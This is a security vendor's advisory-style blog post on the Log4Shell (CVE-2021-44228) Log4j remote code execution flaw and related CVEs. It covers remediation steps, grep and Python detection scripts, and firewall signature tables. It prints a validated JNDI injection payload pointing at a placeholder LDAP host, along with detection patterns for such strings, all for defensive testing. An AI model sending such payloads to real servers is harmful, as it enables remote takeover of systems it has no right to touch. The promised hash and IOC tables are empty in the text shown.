Simulating and Preventing CVE-2021-44228 Apache Log4j RCE Exploits

Picus Labs has updated the Picus Threat Library with attacks that exploit the CVE-2021-44228 Remote Code Execution (RCE) vulnerability affecting Apache Log4j, the ubiquitous Java logging library.

What is the CVE-2021-44228 Log4j Unauthenticated RCE Vulnerability?

Apache Log4j versions prior to 2.15.0 do not protect against attacker-controlled LDAP and other JNDI-related endpoints. When message lookup substitution is enabled, an attacker with control over log messages or log message parameters can execute arbitrary code loaded from LDAP servers. This vulnerability is also dubbed Log4Shell or LogJam.

Test your security controls now: Prevent Log4Shell Exploits with Picus

CVE-2021-44228 is a remote code execution vulnerability that can be exploited without authentication. In other words, it is an unauthenticated RCE vulnerability affecting Apache Log4j versions before 2.15.0.

Log4j Vulnerability Updates (CVE-2021-44832, CVE-2021-45105, CVE-2021-45046)

Update (December 28, 2021): A new vulnerability (CVE-2021-44832) was found in Apache Log4j2 versions 2.0-beta7 through 2.17.0. CVE-2021-44832 is an Arbitrary Code Execution vulnerability. Since exploiting it requires permission to modify the logging configuration, its severity is lower than that of Log4Shell (CVE-2021-44228). Its base CVSS score is 6.6 (medium). This vulnerability is fixed in Log4j versions 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).

Update (December 16, 2021): Since we published this blog post, 2 new vulnerabilities have been discovered.

Apache Log4j versions prior to 2.16.0 are vulnerable to an information leak and remote/local code execution flaw (CVE-2021-45046). It was first reported as a denial of service vulnerability. However, it was later found to be a remote/local code execution vulnerability as well, which increased its CVSS score from 3.7 (low) to 9.0 (critical).

CVE-2021-45105 is another vulnerability found in Apache Log4j versions prior to 2.17.0. It is a denial of service vulnerability with a CVSS score of 7.5 (high). Similar to CVE-2021-45046, a malicious recursive lookup sent via Thread Context Map (MDC) input causes a StackOverflowError in this vulnerability.

What is the Impact of the Log4j RCE Vulnerability? 

The CVE-2021-44228 vulnerability enables remote code execution on systems running vulnerable Log4j versions and gives the attacker full control of the affected server. For example, attackers can exploit CVE-2021-44228 to run malicious code and install webshells as backdoors on vulnerable systems for maintaining access and post-exploitation.

CVE-2021-44228 is a vulnerability that affects the default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. Thus, it is a high-impact vulnerability affecting widely used software.

Update: The CVE-2021-45046 vulnerability also enables remote code execution. However, the delivery of the payload is different from the CVE-2021-44228 vulnerability. Exploiting this vulnerability requires control over Thread Context Map input data, where the attacker needs to create a malicious payload using a JNDI Lookup pattern. When exploited, this vulnerability results in an information leak and remote code execution in some environments and local code execution in all environments.

The CVE-2021-45105 vulnerability enables denial of service (DoS) in Log4j versions prior to 2.17.0. Similar to CVE-2021-45046, attacker-controlled Thread Context Map input data can be leveraged to create uncontrolled recursion from self-referential lookups.

What is the Current Situation?

According to BadPackets and Cert NZ, attackers are actively scanning the Internet for systems running vulnerable Log4j versions and exploiting CVE-2021-44228. This is expected adversary behavior for a remotely exploitable and unauthenticated code execution vulnerability.

Log4j Exploit

In order to exploit the Log4j vulnerability, the attacker must initiate the generation of a log entry containing a JNDI request. Thus, the Log4j exploit payload must be contained within logged errors such as exception traces, authentication failures, and other unexpected vectors of user-controlled input. Then, Log4j must process the exploit payload. 

The exploit payload can be sent in a header field of an HTTP request. Picus Labs researchers validated the following sample payload included in the user-agent header:

${jndi:ldap://example.com}

Note that you need to run a malicious LDAP server to exploit the CVE-2021-44228 vulnerability and modify the example.com part of the payload.

Update: According to the Microsoft Threat Intelligence Center, nation-state actors from various countries are already utilizing Log4j vulnerabilities for their benefit. However, it is not easy to determine where these attacks originate from because attackers are using TOR (The Onion Router) to stay anonymous.

From their TTPs (Tactics, Techniques and Procedures), it can be deduced that APTs like PHOSPHORUS and HAFNIUM are mutating their ransomware using Log4j vulnerabilities. In the future, it is expected that these vulnerabilities will be part of many ransomware attack campaigns.

What Should You Do for Remediation?

The CVE-2021-44228 Log4j RCE vulnerability was patched by Apache in Log4J v2.15.0. Therefore, it is not a zero-day vulnerability. To protect against these attacks, we highly advise organizations to identify vulnerable systems on their networks and update vulnerable Log4j installations.

This vulnerability can also be mitigated in previous releases (>=2.10):

  • by setting the system property "log4j2.formatMsgNoLookups" to "true" 
  • by removing the JndiLookup class from the classpath (example command: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). 

Java 8u121 protects against RCE by setting the properties "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false".

Please keep in mind that Log4J v1 is no longer supported and will not receive patches to address this issue. Log4J v1 is also vulnerable to other RCE attacks, and we strongly advise you to upgrade to Log4J 2.15.0 as soon as possible.

Update: Due to new vulnerabilities found, Apache released Log4j version 2.17.0. This latest version remedies recently found CVE-2021-45046 and CVE-2021-45105 vulnerabilities.
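To audit hosts against the remediation guidance above, the following added example (not Picus or Apache code) inspects log4j-core jars, reads their version, and checks whether JndiLookup.class is still present. The pom.properties path, the function names and the status labels are assumptions of this example; it cannot see the log4j2.formatMsgNoLookups system property, which is set on the JVM rather than in the jar.

```python
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Assumption: Maven-built log4j-core jars record their version in this entry.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_44228 = (2, 15, 0)             # first release patched for CVE-2021-44228
FIXED_ALL = (2, 17, 1)               # fixes every CVE listed in the article
BACKPORTS = {(2, 12, 4), (2, 3, 2)}  # Java 7 / Java 6 fix releases named above


def parse_version(text):
    """'2.14.1' or '2.0-beta9' -> comparable tuple; None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(g or 0) for g in m.groups()) if m else None


def inspect_jar(path):
    """Report version, JndiLookup presence and status for one log4j-core jar."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            found = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = found.group(1).strip() if found else None
    if version is None:  # fall back to the log4j-core-<version>.jar file name
        found = re.search(r"log4j-core-(\d.*)\.jar$", Path(path).name)
        version = found.group(1) if found else None
    parsed, has_jndi = parse_version(version), JNDI_CLASS in names
    if parsed is None:
        status = "unknown-version"
    elif parsed >= FIXED_ALL or parsed in BACKPORTS:
        status = "patched"
    elif parsed >= FIXED_44228:
        status = "upgrade-to-2.17.1"
    elif has_jndi:
        status = "vulnerable"
    else:
        status = "mitigated-jndilookup-removed"
    return {"jar": Path(path).name, "version": version,
            "jndi_lookup": has_jndi, "status": status}


def scan_tree(root):
    """Inspect every log4j-core*.jar under root; nested jars are not unpacked."""
    return [inspect_jar(p) for p in sorted(Path(root).rglob("log4j-core*.jar"))]


def demo():
    """Build constructed stand-in jars (empty entries) and classify them."""
    root = Path(tempfile.mkdtemp())
    for version, with_jndi in [("2.14.1", True), ("2.13.3", False), ("2.17.1", True)]:
        with zipfile.ZipFile(root / f"log4j-core-{version}.jar", "w") as zf:
            zf.writestr(POM_PROPS, f"version={version}\n")
            if with_jndi:  # 2.13.3 models a jar after the zip -d mitigation
                zf.writestr(JNDI_CLASS, b"")
    return {r["jar"]: r["status"] for r in scan_tree(root)}


if __name__ == "__main__":
    print(demo())
```

Jars bundled inside WAR/EAR archives or shaded into application jars are not unpacked here, so a clean result from scan_tree does not by itself prove a host is free of vulnerable copies.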

How Can You Detect CVE-2021-44228 Vulnerability Exploitation Attempts?

Florian Roth, the Head of Research at Nextron Systems, has shared a set of YARA rules for detecting CVE-2021-44228 exploit attempts.

You can also utilize the following shell commands to search for exploitation attempts in uncompressed and compressed files respectively in the /var/log directory and all its subdirectories:

# Uncompressed logs
sudo grep -E -i -r '\$\{jndi:(ldaps?|rmi)://.+' /var/log

# Compressed (.gz) logs
sudo find /var/log -name '*.gz' -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldaps?|rmi)://.+'
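As an added example (not from the original post), the Python below runs the same search as the two commands above over plain and gzip-compressed logs, and goes one step further by extracting the JNDI scheme and callback host from each hit so they can be counted during triage. The log lines are constructed samples, and names such as scan_logs are this example's own.

```python
import gzip
import re
import tempfile
from collections import Counter
from pathlib import Path

# Same pattern the grep commands search for, with the scheme and the callback
# host captured so hits can be grouped during triage.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi)://([^/\s}:]+)", re.IGNORECASE)

# Constructed sample access-log lines (documentation addresses and domains).
SAMPLE_PLAIN = [
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.com}"',
    '203.0.113.7 - - [12/Dec/2021:10:01:05 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1"',
]
SAMPLE_ROTATED = [
    '198.51.100.9 - - [11/Dec/2021:23:59:58 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:RMI://example.net:1099/a}"',
]


def open_log(path):
    """Open a plain or gzip-compressed log as text, tolerating bad bytes."""
    opener = gzip.open if path.suffix == ".gz" else open
    return opener(path, "rt", encoding="utf-8", errors="replace")


def scan_logs(root):
    """Return (hits, hosts): one tuple per match and a count per callback host."""
    hits, hosts = [], Counter()
    for path in sorted(p for p in Path(root).rglob("*") if p.is_file()):
        try:
            with open_log(path) as fh:
                for lineno, line in enumerate(fh, 1):
                    for m in JNDI_RE.finditer(line):
                        scheme, host = m.group(1).lower(), m.group(2).lower()
                        hits.append((path.name, lineno, scheme, host))
                        hosts[host] += 1
        except (OSError, EOFError):
            continue  # unreadable or truncated file: keep scanning the rest
    return hits, hosts


def demo():
    """Write the constructed samples to a temp directory and scan it."""
    root = Path(tempfile.mkdtemp())
    (root / "access.log").write_text("\n".join(SAMPLE_PLAIN) + "\n")
    with gzip.open(root / "access.log.1.gz", "wt") as fh:
        fh.write("\n".join(SAMPLE_ROTATED) + "\n")
    return scan_logs(root)


if __name__ == "__main__":
    found, by_host = demo()
    for name, lineno, scheme, host in found:
        print(f"{name}:{lineno} {scheme} -> {host}")
    print(by_host.most_common())
```

A hit shows that a request carrying the string was logged, not that the lookup was executed; outbound connections to the listed callback hosts are the follow-up evidence to check.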

How Picus Helps Simulate and Prevent CVE-2021-44228 Exploits?

We strongly suggest simulating the CVE-2021-44228 vulnerability to test the effectiveness of your security controls against Log4J attacks, determine gaps, and utilize prevention signatures to fill your security gaps using the Picus Security Control Validation Platform.

The Picus Threat Library includes the following threat for the CVE-2021-44228 vulnerability. Moreover, it contains 1500+ vulnerability exploitation and endpoint attacks in addition to 11.000+ other threats as of today.

| Threat ID | Action Name | Attack Module |
| --- | --- | --- |
| 21296 | Apache Log4j Web Attack Campaign | Web Application |

Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures to address CVE-2021-44228 Log4J RCE and other vulnerability exploitation attacks in preventive security controls. Currently validated signatures are given below:

| Security Control | Signature IDs | Signature Name |
| --- | --- | --- |
| Forcepoint NGFW | | Generic_CS-Log4j-Remote-Code-Execution |
| Forcepoint NGFW | | HTTP_CS_Log4j-Remote-Code-Execution |
| Palo Alto Networks NGFW | 91991, 91994, 92001 | Apache Log4j Remote Code Execution Vulnerability |
| Check Point NGFW | asm_dynamic_prop_CVE_2021_44228 | Apache Log4j Remote Code Execution (CVE-2021-44228) |
| FortiGate NGFW | 51006 | Apache.Log4j.Error.Log.Remote.Code.Execution |
| Snort IPS | 2034655 | ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228) |
| Snort IPS | 2034647 | ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) |
| Snort IPS | 2034658 | ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228) |
| Snort IPS | 2034648 | ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228) |
| Snort IPS | 2034654 | ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228) |
| Snort IPS | 2034668 | ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228) |
| Snort IPS | 2034649 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) |
| Snort IPS | 2034657 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228) |
| Snort IPS | 2034650 | ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228) |
| Snort IPS | 2034653 | ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228) |
| Snort IPS | 2034667 | ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228) |
| Snort IPS | 2034651 | ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228) |
| Snort IPS | 2034656 | ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228) |
| Snort IPS | 2034652 | ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228) |
| Snort IPS | 2034659 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228) |
| Snort IPS | 2034659 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228) |
| Snort IPS | 2034660 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228) |
| Snort IPS | 2034673 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228) |
| Snort IPS | 2034661, 2034662 | ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228) |
| Snort IPS | 2034665, 2034666 | ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228) |
| Snort IPS | 2034663, 2034664 | ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228) |
| Snort IPS | 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58725, 58737, 58738, 58739, 58744 | SERVER-OTHER Apache Log4j logging remote code execution attempt |
| F5 BIG-IP ASM | 200104772 | JNDI Injection Attempt (Content) |
| F5 BIG-IP ASM | 200104769 | JNDI Injection Attempt (Header) |
| F5 BIG-IP ASM | 200104768 | JNDI Injection Attempt (Parameter) |
| F5 BIG-IP ASM | 200104723 | JNDI Injection Attempt (ldap) (Header) |
| F5 BIG-IP ASM | 200104725 | JNDI Injection Attempt (rmi) (Header) |
| F5 BIG-IP ASM | 200004451 | JSP Expression Language Expression Injection (2) (Header) |
| F5 BIG-IP ASM | 200004450 | JSP Expression Language Expression Injection (2) (Parameter) |
| F5 BIG-IP ASM | 200104773 | JSP Expression Language Expression Injection (3) (Content) |
| F5 BIG-IP ASM | 200104771 | JSP Expression Language Expression Injection (3) (Header) |
| F5 BIG-IP ASM | 200104770 | JSP Expression Language Expression Injection (3) (Parameter) |
| F5 BIG-IP ASM | 200004474 | JSP Expression Language Expression Injection (3) (URI) |
| Cisco Firepower NGFW | 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58723, 58724, 58725, 58737, 58738, 58739, 58742, 58744 | SERVER-OTHER Apache Log4j logging remote code execution attempt |
| Citrix Web App Firewall | 999078 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via BODY (CVE-2021-44228) |
| Citrix Web App Firewall | 999077 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via FORM (CVE-2021-44228) |
| Citrix Web App Firewall | 999079 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via HEADER (CVE-2021-44228) |
| Citrix Web App Firewall | 999080 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via URL (CVE-2021-44228) |
| Citrix Web App Firewall | 999077 | web-misc apache log4j - remote code execution vulnerability via form (cve-2021-44228) |
| Citrix Web App Firewall | 999079 | web-misc apache log4j - remote code execution vulnerability via header (cve-2021-44228) |
| FortiWeb Web Application Security | 90490119, 90490120 | Known Exploits |
| McAfee NSP | 0x4529f700 | HTTP: Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) |
| ModSecurity | 932100 | Remote Command Execution: Unix Command Injection |
| ModSecurity | 932130 | Remote Command Execution: Unix Shell Expression Found |
| TippingPoint TPS | 40627 | HTTP: JNDI Injection in HTTP Request |

We will update the above list when Picus Labs validates the signatures of other vendors/products.

Which Log4j Versions are Vulnerable?

The CVE-2021-44228 vulnerability affects Apache Log4j versions 2.0 to 2.14.1. SHA-256 hashes and default filenames of all vulnerable Log4j versions are given in the table below:


Indicators of Compromise (IOCs)

The following IP addresses have been observed exploiting the CVE-2021-44228 Log4j vulnerability. Although most of them are IP addresses of TOR exit nodes and blocking them may result in false positives, it is suggested to block these addresses in such critical cases.
